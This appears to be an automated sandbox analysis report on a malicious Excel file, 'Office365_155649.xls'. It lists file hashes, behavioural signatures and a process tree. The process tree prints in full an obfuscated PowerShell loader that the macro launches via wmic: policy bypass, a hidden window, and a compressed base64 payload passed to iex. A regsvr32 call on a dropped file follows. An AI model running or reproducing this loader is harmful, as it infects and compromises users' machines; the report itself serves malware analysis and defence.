Analysis
-
max time kernel
135s -
max time network
126s -
platform
windows10_x64 -
resource
win10 -
submitted
13-07-2020 23:03
Static task
static1
Behavioral task
behavioral1
Sample
Office365_155649.xls
Resource
win7v200430
Behavioral task
behavioral2
Sample
Office365_155649.xls
Resource
win10
General
-
Target
Office365_155649.xls
-
Size
65KB
-
MD5
ad99acf449d38ae16688948601ac1c48
-
SHA1
aca7300bbd57be32427a1b69ab7ab9792d4d7efe
-
SHA256
478b989b58015300f188b4d6459d08d61edef08730fdc2256601cddd7b98ebb3
-
SHA512
9893e23ce9856eb086992d3ccbce7a673b0cbab171eeac991034eb5ac3f5d6f735e1f49a767e05dc77c1b09a3a66f161add8d2921895bf783e5b64e18057a635
Malware Config
Signatures
-
Suspicious use of WriteProcessMemory 4 IoCs
Processes:
EXCEL.EXEpOwershElL.exedescription pid process target process PID 2728 wrote to memory of 728 2728 EXCEL.EXE wmic.exe PID 2728 wrote to memory of 728 2728 EXCEL.EXE wmic.exe PID 2220 wrote to memory of 1508 2220 pOwershElL.exe regsvr32.exe PID 2220 wrote to memory of 1508 2220 pOwershElL.exe regsvr32.exe -
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
pOwershElL.exepid process 2220 pOwershElL.exe 2220 pOwershElL.exe 2220 pOwershElL.exe -
Blacklisted process makes network request 1 IoCs
Processes:
pOwershElL.exeflow pid process 20 2220 pOwershElL.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
EXCEL.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
EXCEL.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE -
Suspicious use of SetWindowsHookEx 10 IoCs
Processes:
EXCEL.EXEpid process 2728 EXCEL.EXE 2728 EXCEL.EXE 2728 EXCEL.EXE 2728 EXCEL.EXE 2728 EXCEL.EXE 2728 EXCEL.EXE 2728 EXCEL.EXE 2728 EXCEL.EXE 2728 EXCEL.EXE 2728 EXCEL.EXE -
Process spawned unexpected child process 2 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
wmic.exepOwershElL.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 728 2728 wmic.exe EXCEL.EXE Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2220 1656 pOwershElL.exe -
Suspicious use of AdjustPrivilegeToken 43 IoCs
Processes:
wmic.exepOwershElL.exedescription pid process Token: SeIncreaseQuotaPrivilege 728 wmic.exe Token: SeSecurityPrivilege 728 wmic.exe Token: SeTakeOwnershipPrivilege 728 wmic.exe Token: SeLoadDriverPrivilege 728 wmic.exe Token: SeSystemProfilePrivilege 728 wmic.exe Token: SeSystemtimePrivilege 728 wmic.exe Token: SeProfSingleProcessPrivilege 728 wmic.exe Token: SeIncBasePriorityPrivilege 728 wmic.exe Token: SeCreatePagefilePrivilege 728 wmic.exe Token: SeBackupPrivilege 728 wmic.exe Token: SeRestorePrivilege 728 wmic.exe Token: SeShutdownPrivilege 728 wmic.exe Token: SeDebugPrivilege 728 wmic.exe Token: SeSystemEnvironmentPrivilege 728 wmic.exe Token: SeRemoteShutdownPrivilege 728 wmic.exe Token: SeUndockPrivilege 728 wmic.exe Token: SeManageVolumePrivilege 728 wmic.exe Token: 33 728 wmic.exe Token: 34 728 wmic.exe Token: 35 728 wmic.exe Token: 36 728 wmic.exe Token: SeIncreaseQuotaPrivilege 728 wmic.exe Token: SeSecurityPrivilege 728 wmic.exe Token: SeTakeOwnershipPrivilege 728 wmic.exe Token: SeLoadDriverPrivilege 728 wmic.exe Token: SeSystemProfilePrivilege 728 wmic.exe Token: SeSystemtimePrivilege 728 wmic.exe Token: SeProfSingleProcessPrivilege 728 wmic.exe Token: SeIncBasePriorityPrivilege 728 wmic.exe Token: SeCreatePagefilePrivilege 728 wmic.exe Token: SeBackupPrivilege 728 wmic.exe Token: SeRestorePrivilege 728 wmic.exe Token: SeShutdownPrivilege 728 wmic.exe Token: SeDebugPrivilege 728 wmic.exe Token: SeSystemEnvironmentPrivilege 728 wmic.exe Token: SeRemoteShutdownPrivilege 728 wmic.exe Token: SeUndockPrivilege 728 wmic.exe Token: SeManageVolumePrivilege 728 wmic.exe Token: 33 728 wmic.exe Token: 34 728 wmic.exe Token: 35 728 wmic.exe Token: 36 728 wmic.exe Token: SeDebugPrivilege 2220 pOwershElL.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
EXCEL.EXEpid process 2728 EXCEL.EXE
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\Office365_155649.xls"1⤵
- Suspicious use of WriteProcessMemory
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of SetWindowsHookEx
- Suspicious behavior: AddClipboardFormatListener
PID:2728 -
C:\Windows\System32\Wbem\wmic.exewmic pROcesS call CREATE "pOwershElL -noproF -NOniNTER -Win 01 -ExeCUTIoNpOL byPasS iex("\"&('s'+'al') ('utf-'+'8') ('New'+'-Obje'+'ct');& ( `${S`H`elLid}[1]+`${shEL`l`ID}[13]+'X')(.('utf'+'-8') ('i'+'o'+'.STrEa'+'MreA'+'deR')(( &('u'+'tf-8') ('IO.'+'co'+'M'+'PREsS'+'Ion'+'.DE'+'fLAtEST'+'rEam')( [sYsTem.IO.MemorYSTReAm][sYStEM.CONVeRT]::fRomBASE64StRinG( ('bVVrc9o'+'4FP0rDuOt5AJOoE03'+'CcPsEvIoKcmmhYXtUqZ2jCBq/CC2TEJd/fc9VyYkmdkPIKH7'+'Ojr36GIXay/UbcZadpHp9h6WhW43sFxdYd1726Cj2Puh25zlrMpufOZUOZulEj/yiDmteR4HSiaxddnkdtH7qJ3CLjdult9kKpXxglNax6qnYhn6geCszmp2se5r5+Xh4OmwlQqVp7FlF9+1flHgE/KMkV/O+Q5/w9lQZKoOHN0EX3EsyI12DFm7FD4GhmU'+'oFWe7zJk0p+4wldFpPOPMIp/jfD4X'+'6UD+FFbjA0KSPFZWw'+'6oLH7EDbdXvcymU4xQbPPtAYxeX3icw5hNlay/CNqZ'+'tx+sQRzEBUDIDMXYReF06SyKcWfjsLkWagD9DtzFiCbYYLRM0QB9wt6jJHM5dzhYIfIgk8HI2lvG75veAakRLaoASa'+'bbGJqOqguos02'+'RGlkAxx3HzXM4oqQDM'+'W0VODN1bZkeEBkhKGBO7ONf'+'TanmJKnMDOG0tma4'+'Z87ZRFuPfTop97bCaycH+YAgdDHQLfSHkd0BOJcGwuLf2oYdCeDO67OlLTezVDjbQYJjpKun'+'sgspTOrFlxUXnDADdAhuDko'+'gR8Pv4pNK/CbGKo905DKbCVk8W6ekr9E1lPnrHVGgdaSLBpFohomFVroRyx+KmG0p'+'h'+'395UWrjCo'+'FdW8ZGfRB8KIqzbpFOYczUn2R3QTyQ6LxPVR77jmOiRiQ7wXTlJHuIw8Wcnvr'+'KjuwqAJF7nBKrgk'+'+6tn06mU0o4enUXE22KIWWYi79ix+Wl2wYPPqHYFiEv9LoXr5I7UToSPSZf6TUnLZhcjlO/SGT8zMvQOzsnYsTVyDvyhqeXS9J4JAH'+'RLgB0o8BAGnqN96835ZkgPdVTP54ZQVKN2I/Es1AqbvF'+'e23TpMZUwwVX2jfqLAtRpmFaXZDOsvBoYRncL'+'g3Gp2xMZqymcI/0WsykmjH3vc0db29hURMlKvA687lNuOPp4zEZPbMf0nt6LHxpusswsqVhkK+rCu6Z5hj88qjoUj8o9jYNkBlDTo6O/h2cHzwNp5HVQ76'+'f3D828YkA'+'TYNJN4pVIF'+'XzP0iQ69jPx4f3g6U7/eo8vp9vAp/GWpMIPbmGVSluSzgF7QgNoSmnRnT+5uYx3PaTrrDB03GFC8umkqb82'+'xp4yU2Plm7fX84aog8zYX4QUhNdp0aX6ICJU2Eq4uAFNPDLAqVqlagttVdvWJEDyKZ8cr5UA670h4blAMKbAzWOSPhmuvaUypr7+'+'DW0igGXOqWNG5cobUfHQu+9o98vmXXK'+'KC8vRMq1WdipOraTbPRdqS9U5/hta'+'E5m4cxkKsDlOpRKdMKTKGewPusafL7xa6Veya+7tQXgOUmAm'+'kd8CM42VGn7QjtsX8ULdbqhYon3iEezT483MExRLuDabRiqkj3pmAksHQcI3Dof/h7Av4yeEE6hKPML2NJPMeK9xzr5+/n1GeUFK3+8Ki4PyzpfpwWF1s2lsNvv7Tq3cHTaJqOgOxPwH'))"\"+ ([ChAR]44).ToStrinG() +"\"[Io.ComprEssion.ComPreSSIoNmODE]::DecOMpREsS))"\"+ ([ChAR]44).ToStrinG() +"\" [SYsteM.tExT.EncODiNg]::AsCII)).REaDtOEnD( )"\")"2⤵
- Process spawned unexpected child process
- Suspicious use of AdjustPrivilegeToken
PID:728
-
C:\Windows\System32\WindowsPowerShell\v1.0\pOwershElL.exepOwershElL -noproF -NOniNTER -Win 01 -ExeCUTIoNpOL byPasS iex("\"&('s'+'al') ('utf-'+'8') ('New'+'-Obje'+'ct');& ( `${S`H`elLid}[1]+`${shEL`l`ID}[13]+'X')(.('utf'+'-8') ('i'+'o'+'.STrEa'+'MreA'+'deR')(( &('u'+'tf-8') ('IO.'+'co'+'M'+'PREsS'+'Ion'+'.DE'+'fLAtEST'+'rEam')( [sYsTem.IO.MemorYSTReAm][sYStEM.CONVeRT]::fRomBASE64StRinG( ('bVVrc9o'+'4FP0rDuOt5AJOoE03'+'CcPsEvIoKcmmhYXtUqZ2jCBq/CC2TEJd/fc9VyYkmdkPIKH7'+'Ojr36GIXay/UbcZadpHp9h6WhW43sFxdYd1726Cj2Puh25zlrMpufOZUOZulEj/yiDmteR4HSiaxddnkdtH7qJ3CLjdult9kKpXxglNax6qnYhn6geCszmp2se5r5+Xh4OmwlQqVp7FlF9+1flHgE/KMkV/O+Q5/w9lQZKoOHN0EX3EsyI12DFm7FD4GhmU'+'oFWe7zJk0p+4wldFpPOPMIp/jfD4X'+'6UD+FFbjA0KSPFZWw'+'6oLH7EDbdXvcymU4xQbPPtAYxeX3icw5hNlay/CNqZ'+'tx+sQRzEBUDIDMXYReF06SyKcWfjsLkWagD9DtzFiCbYYLRM0QB9wt6jJHM5dzhYIfIgk8HI2lvG75veAakRLaoASa'+'bbGJqOqguos02'+'RGlkAxx3HzXM4oqQDM'+'W0VODN1bZkeEBkhKGBO7ONf'+'TanmJKnMDOG0tma4'+'Z87ZRFuPfTop97bCaycH+YAgdDHQLfSHkd0BOJcGwuLf2oYdCeDO67OlLTezVDjbQYJjpKun'+'sgspTOrFlxUXnDADdAhuDko'+'gR8Pv4pNK/CbGKo905DKbCVk8W6ekr9E1lPnrHVGgdaSLBpFohomFVroRyx+KmG0p'+'h'+'395UWrjCo'+'FdW8ZGfRB8KIqzbpFOYczUn2R3QTyQ6LxPVR77jmOiRiQ7wXTlJHuIw8Wcnvr'+'KjuwqAJF7nBKrgk'+'+6tn06mU0o4enUXE22KIWWYi79ix+Wl2wYPPqHYFiEv9LoXr5I7UToSPSZf6TUnLZhcjlO/SGT8zMvQOzsnYsTVyDvyhqeXS9J4JAH'+'RLgB0o8BAGnqN96835ZkgPdVTP54ZQVKN2I/Es1AqbvF'+'e23TpMZUwwVX2jfqLAtRpmFaXZDOsvBoYRncL'+'g3Gp2xMZqymcI/0WsykmjH3vc0db29hURMlKvA687lNuOPp4zEZPbMf0nt6LHxpusswsqVhkK+rCu6Z5hj88qjoUj8o9jYNkBlDTo6O/h2cHzwNp5HVQ76'+'f3D828YkA'+'TYNJN4pVIF'+'XzP0iQ69jPx4f3g6U7/eo8vp9vAp/GWpMIPbmGVSluSzgF7QgNoSmnRnT+5uYx3PaTrrDB03GFC8umkqb82'+'xp4yU2Plm7fX84aog8zYX4QUhNdp0aX6ICJU2Eq4uAFNPDLAqVqlagttVdvWJEDyKZ8cr5UA670h4blAMKbAzWOSPhmuvaUypr7+'+'DW0igGXOqWNG5cobUfHQu+9o98vmXXK'+'KC8vRMq1WdipOraTbPRdqS9U5/hta'+'E5m4cxkKsDlOpRKdMKTKGewPusafL7xa6Veya+7tQXgOUmAm'+'kd8CM42VGn7QjtsX8ULdbqhYon3iEezT483MExRLuDabRiqkj3pmAksHQcI3Dof/h7Av4yeEE6hKPML2NJPMeK9xzr5+/n1GeUFK3+8Ki4PyzpfpwWF1s2lsNvv7Tq3cHTaJqOgOxPwH'))"\"+ ([ChAR]44).ToStrinG() +"\"[Io.ComprEssion.ComPreSSIoNmODE]::DecOMpREsS))"\"+ ([ChAR]44).ToStrinG() +"\" [SYsteM.tExT.EncODiNg]::AsCII)).REaDtOEnD( )"\")1⤵
- Suspicious use of WriteProcessMemory
- Suspicious behavior: EnumeratesProcesses
- Blacklisted process makes network request
- Process spawned unexpected child process
- Suspicious use of AdjustPrivilegeToken
PID:2220 -
C:\Windows\system32\regsvr32.exe"C:\Windows\system32\regsvr32.exe" -s C:\Users\Admin\AppData\Local\Temp\JavaDeployReg.2⤵PID:1508